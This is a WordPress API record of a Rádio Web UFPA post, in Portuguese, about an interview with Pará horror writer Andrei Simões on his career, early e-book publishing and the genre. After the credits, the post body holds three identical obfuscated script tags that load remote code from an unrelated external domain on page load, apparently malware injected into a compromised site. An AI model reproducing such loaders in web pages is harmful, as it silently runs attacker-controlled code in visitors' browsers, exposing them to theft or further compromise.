{"id":8854,"date":"2021-09-06T08:00:00","date_gmt":"2021-09-06T11:00:00","guid":{"rendered":"http:\/\/radio.ufpa.br\/?p=8854"},"modified":"2025-10-21T11:29:09","modified_gmt":"2025-10-21T14:29:09","slug":"andrei-simoes","status":"publish","type":"post","link":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/andrei-simoes\/","title":{"rendered":"Andrei Sim\u00f5es"},"content":{"rendered":"\n<div class=\"rwc-audio-block\" class=\"wp-block-radioweb-rwcaudioblock\"><div class=\"rwc-audio-block-header\"><span class=\"dashicon dashicons dashicons-media-audio\"><\/span><div class=\"rwc-audio-block-description\"><p>&#8220;Andrei Sim\u00f5es&#8221;<\/p><p class=\"category\">UFPA Entrevista<\/p><p>R\u00e1dio Web UFPA<\/p><\/div><\/div><audio controls><source src=\"https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/09\/UFPA-ENTREVISTA-ANDREI-SIMOES-06.09.21.mp3\" type=\"audio\/mpeg\"\/><\/audio><\/div>\n\n\n\n<p>Nesta edi\u00e7\u00e3o do UFPA Entrevista, conhe\u00e7a o trabalho de Andrei Sim\u00f5es. Bi\u00f3logo, professor, pesquisador e escritor dedicado ao g\u00eanero de terror, Andrei conta sobre sua carreira de mais de 20 anos na literatura.<\/p>\n\n\n\n<p>Na entrevista, o artista relata que come\u00e7ou a escrever em meados dos anos 1990 por meio de publica\u00e7\u00f5es em f\u00f3runs de redes locais chamadas PPS. Nesse contexto anterior \u00e0 populariza\u00e7\u00e3o da internet, Andrei Sim\u00f5es publicou uma s\u00e9rie de contos e criou o personagem \u201cZon\u201d, em 1995. Anos depois, ele inovou e foi o primeiro autor paraense a lan\u00e7ar uma obra completa em formato digital.<\/p>\n\n\n\n<p>\u201cEu sou considerado o primeiro autor a publicar um e-book \u2014 n\u00e3o existia nem esse termo aqui no Brasil, pelo menos. E fui o primeiro autor a publicar um e-book de fic\u00e7\u00e3o, e a\u00ed eu publiquei esse livro em 2000. A cada semana eu publicava um cap\u00edtulo em um site de contracultura chamado \u2018A Barata\u2019. Esse site ficou mais de 20 anos no ar. E depois, em 2005, publiquei meu primeiro livro em papel\u201d, diz.<\/p>\n\n\n\n<p>A possibilidade de publicar livros em formato digital traz benef\u00edcios para os escritores e tamb\u00e9m para o p\u00fablico. O autor destaca, por exemplo, as vantagens de acessibilidade. \u201cO e-book tem a facilidade de ser bem mais barato. N\u00f3s temos um retorno financeiro um pouco maior e a pessoa que compra, compra o livro 4, 5 vezes mais barato que o livro em papel, hoje em dia. Al\u00e9m de ter a quest\u00e3o da inclus\u00e3o. Pessoas cegas t\u00eam mais facilidade para ler o e-book por causa dos softwares que fazem a convers\u00e3o para \u00e1udio\u201d.<\/p>\n\n\n\n<p>Uma das marcas da literatura de Andrei Sim\u00f5es \u00e9 o trabalho com temas relacionados ao terror, ao horror e ao ocultismo. Para ele, a paix\u00e3o por essas tem\u00e1ticas vem da vontade de estar ao lado dos oprimidos.<\/p>\n\n\n\n<p>\u201cO terror tem esse charme de ser considerado um subg\u00eanero de n\u00e3o ser levado muito a s\u00e9rio, assim como a fic\u00e7\u00e3o cient\u00edfica. Ent\u00e3o, existe sempre um preconceito, e onde tem um preconceito eu sei que existe a vis\u00e3o do opressor tentando apagar o que o incomoda. E \u00e9 l\u00e1 que eu gosto de estar, do outro lado, do oprimido tentando lutar contra o opressor\u201d, afirma o escritor.<\/p>\n\n\n\n<p>&#8220;A arte se completa na tr\u00edade de ter uma obra, voc\u00ea produzi-la, e ela ser absorvida por algu\u00e9m, pois existe uma conex\u00e3o de comunica\u00e7\u00e3o. Arte \u00e9 comunica\u00e7\u00e3o, s\u00f3 que dentro de um contexto mais amplo do que s\u00f3 o contexto racional ou emocional, no contexto muito completo&#8221;, complementa Andrei Sim\u00f5es.<\/p>\n\n\n\n<p>A obra completa de Andrei Sim\u00f5es est\u00e1 sendo lan\u00e7ada em formato de e-books. Atualmente, os livros<a href=\"https:\/\/www.amazon.com.br\/LUZ-Deus-Horror-Andrei-Sim%C3%B5es-ebook\/dp\/B0979QCF9C\/ref=sr_1_5?__mk_pt_BR=%C3%85M%C3%85%C5%BD%C3%95%C3%91&amp;dchild=1&amp;keywords=Andrei+Sim%C3%B5es&amp;qid=1624381430&amp;sr=8-5\"> <em>LUZ, o Deus do Hor<\/em>ror<\/a>, <em><a href=\"https:\/\/www.amazon.com.br\/dp\/B097Q25GGL\/ref=sr_1_4?__mk_pt_BR=%C3%85M%C3%85%C5%BD%C3%95%C3%91&amp;dchild=1&amp;keywords=Andrei+Sim%C3%B5es&amp;qid=1624381430&amp;sr=8-4\">777<\/a><\/em> e <em><a href=\"https:\/\/www.amazon.com.br\/Espiral-Andrei-Sim%C3%B5es-ebook\/dp\/B07HDYSC86\/ref=sr_1_3?__mk_pt_BR=%C3%85M%C3%85%C5%BD%C3%95%C3%91&amp;dchild=1&amp;keywords=Andrei+Sim%C3%B5es&amp;qid=1624381430&amp;sr=8-3\">A Espiral<\/a><\/em> j\u00e1 est\u00e3o dispon\u00edveis no site da Amazon. As demais obras poder\u00e3o ser adquiridas a partir de outubro de 2021.<\/p>\n\n\n\n<p>Na programa\u00e7\u00e3o da R\u00e1dio Web UFPA, fique atento aos hor\u00e1rios do UFPA Entrevista com Andrei Sim\u00f5es.<br>Segunda-feira: 15h<br>Quarta-feira: 15h<\/p>\n\n\n\n<p>Apresenta\u00e7\u00e3o: Elissandra Batista<br>Produ\u00e7\u00e3o e roteiro: Thaiane Martins<br>Grava\u00e7\u00e3o e montagem: Jo\u00e3o Nilo Ferreira<br>Supervis\u00e3o e edi\u00e7\u00e3o: Elissandra Batista e Fabr\u00edcio Queiroz<\/p>\n<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script>","protected":false},"excerpt":{"rendered":"<p> &#8230; <a title=\"Andrei Sim\u00f5es\" class=\"read-more\" href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/andrei-simoes\/\" aria-label=\"Read more about Andrei Sim\u00f5es\">Ler mais<\/a><\/p>\n","protected":false},"author":2,"featured_media":8857,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":true,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[36],"tags":[],"class_list":["post-8854","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ufpa-entrevista"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Andrei Sim\u00f5es - Radio Web UFPA<\/title>\n<meta name=\"description\" content=\"Neste programa, conhe\u00e7a a carreira do escritor paraense Andrei Sim\u00f5es e o seu trabalho com a literatura de terror e horror.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/andrei-simoes\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Andrei Sim\u00f5es - Radio Web UFPA\" \/>\n<meta property=\"og:description\" content=\"Neste programa, conhe\u00e7a a carreira do escritor paraense Andrei Sim\u00f5es e o seu trabalho com a literatura de terror e horror.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/andrei-simoes\/\" \/>\n<meta property=\"og:site_name\" content=\"Radio Web UFPA\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/radiowebufpa\" \/>\n<meta property=\"article:published_time\" content=\"2021-09-06T11:00:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T14:29:09+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/09\/Escritor-Andrei-Simoes.jpg?fit=1080%2C933&ssl=1\" \/>\n\t<meta property=\"og:image:width\" content=\"1080\" \/>\n\t<meta property=\"og:image:height\" content=\"933\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Fabr\u00edcio Queiroz\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:site\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Fabr\u00edcio Queiroz\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/andrei-simoes\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/andrei-simoes\/\"},\"author\":{\"name\":\"Fabr\u00edcio Queiroz\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096\"},\"headline\":\"Andrei Sim\u00f5es\",\"datePublished\":\"2021-09-06T11:00:00+00:00\",\"dateModified\":\"2025-10-21T14:29:09+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/andrei-simoes\/\"},\"wordCount\":553,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/andrei-simoes\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/09\/Escritor-Andrei-Simoes.jpg?fit=1080%2C933&ssl=1\",\"articleSection\":[\"UFPA Entrevista\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/andrei-simoes\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/andrei-simoes\/\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/andrei-simoes\/\",\"name\":\"Andrei Sim\u00f5es - Radio Web UFPA\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/andrei-simoes\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/andrei-simoes\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/09\/Escritor-Andrei-Simoes.jpg?fit=1080%2C933&ssl=1\",\"datePublished\":\"2021-09-06T11:00:00+00:00\",\"dateModified\":\"2025-10-21T14:29:09+00:00\",\"description\":\"Neste programa, conhe\u00e7a a carreira do escritor paraense Andrei Sim\u00f5es e o seu trabalho com a literatura de terror e horror.\",\"breadcrumb\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/andrei-simoes\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/andrei-simoes\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/andrei-simoes\/#primaryimage\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/09\/Escritor-Andrei-Simoes.jpg?fit=1080%2C933&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/09\/Escritor-Andrei-Simoes.jpg?fit=1080%2C933&ssl=1\",\"width\":1080,\"height\":933},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/andrei-simoes\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/radio.ufpa.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Andrei Sim\u00f5es\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/radio.ufpa.br\/#website\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"name\":\"Radio Web UFPA\",\"description\":\"Divulgando o conhecimento\",\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/radio.ufpa.br\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/radio.ufpa.br\/#organization\",\"name\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"width\":417,\"height\":121,\"caption\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/radiowebufpa\",\"https:\/\/x.com\/radiowebufpa\",\"https:\/\/www.instagram.com\/radiowebufpa\/\",\"https:\/\/www.youtube.com\/user\/RadioWebUFP4\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096\",\"name\":\"Fabr\u00edcio Queiroz\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g\",\"caption\":\"Fabr\u00edcio Queiroz\"},\"description\":\"Editor e Jornalista respons\u00e1vel\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/author\/fabricio\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Andrei Sim\u00f5es - Radio Web UFPA","description":"Neste programa, conhe\u00e7a a carreira do escritor paraense Andrei Sim\u00f5es e o seu trabalho com a literatura de terror e horror.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/andrei-simoes\/","og_locale":"pt_BR","og_type":"article","og_title":"Andrei Sim\u00f5es - Radio Web UFPA","og_description":"Neste programa, conhe\u00e7a a carreira do escritor paraense Andrei Sim\u00f5es e o seu trabalho com a literatura de terror e horror.","og_url":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/andrei-simoes\/","og_site_name":"Radio Web UFPA","article_publisher":"https:\/\/www.facebook.com\/radiowebufpa","article_published_time":"2021-09-06T11:00:00+00:00","article_modified_time":"2025-10-21T14:29:09+00:00","og_image":[{"width":1080,"height":933,"url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/09\/Escritor-Andrei-Simoes.jpg?fit=1080%2C933&ssl=1","type":"image\/jpeg"}],"author":"Fabr\u00edcio Queiroz","twitter_card":"summary_large_image","twitter_creator":"@radiowebufpa","twitter_site":"@radiowebufpa","twitter_misc":{"Escrito por":"Fabr\u00edcio Queiroz","Est. tempo de leitura":"3 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/andrei-simoes\/#article","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/andrei-simoes\/"},"author":{"name":"Fabr\u00edcio Queiroz","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096"},"headline":"Andrei Sim\u00f5es","datePublished":"2021-09-06T11:00:00+00:00","dateModified":"2025-10-21T14:29:09+00:00","mainEntityOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/andrei-simoes\/"},"wordCount":553,"commentCount":0,"publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/andrei-simoes\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/09\/Escritor-Andrei-Simoes.jpg?fit=1080%2C933&ssl=1","articleSection":["UFPA Entrevista"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/andrei-simoes\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/andrei-simoes\/","url":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/andrei-simoes\/","name":"Andrei Sim\u00f5es - Radio Web UFPA","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/andrei-simoes\/#primaryimage"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/andrei-simoes\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/09\/Escritor-Andrei-Simoes.jpg?fit=1080%2C933&ssl=1","datePublished":"2021-09-06T11:00:00+00:00","dateModified":"2025-10-21T14:29:09+00:00","description":"Neste programa, conhe\u00e7a a carreira do escritor paraense Andrei Sim\u00f5es e o seu trabalho com a literatura de terror e horror.","breadcrumb":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/andrei-simoes\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/andrei-simoes\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/andrei-simoes\/#primaryimage","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/09\/Escritor-Andrei-Simoes.jpg?fit=1080%2C933&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/09\/Escritor-Andrei-Simoes.jpg?fit=1080%2C933&ssl=1","width":1080,"height":933},{"@type":"BreadcrumbList","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/andrei-simoes\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/radio.ufpa.br\/"},{"@type":"ListItem","position":2,"name":"Andrei Sim\u00f5es"}]},{"@type":"WebSite","@id":"https:\/\/radio.ufpa.br\/#website","url":"https:\/\/radio.ufpa.br\/","name":"Radio Web UFPA","description":"Divulgando o conhecimento","publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/radio.ufpa.br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/radio.ufpa.br\/#organization","name":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA","url":"https:\/\/radio.ufpa.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","width":417,"height":121,"caption":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA"},"image":{"@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/radiowebufpa","https:\/\/x.com\/radiowebufpa","https:\/\/www.instagram.com\/radiowebufpa\/","https:\/\/www.youtube.com\/user\/RadioWebUFP4"]},{"@type":"Person","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096","name":"Fabr\u00edcio Queiroz","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g","caption":"Fabr\u00edcio Queiroz"},"description":"Editor e Jornalista respons\u00e1vel","url":"https:\/\/radio.ufpa.br\/index.php\/author\/fabricio\/"}]}},"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/09\/Escritor-Andrei-Simoes.jpg?fit=1080%2C933&ssl=1","jetpack_shortlink":"https:\/\/wp.me\/p8TJeA-2iO","jetpack_likes_enabled":true,"jetpack-related-posts":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/8854","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/comments?post=8854"}],"version-history":[{"count":7,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/8854\/revisions"}],"predecessor-version":[{"id":17550,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/8854\/revisions\/17550"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media\/8857"}],"wp:attachment":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media?parent=8854"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/categories?post=8854"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/tags?post=8854"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}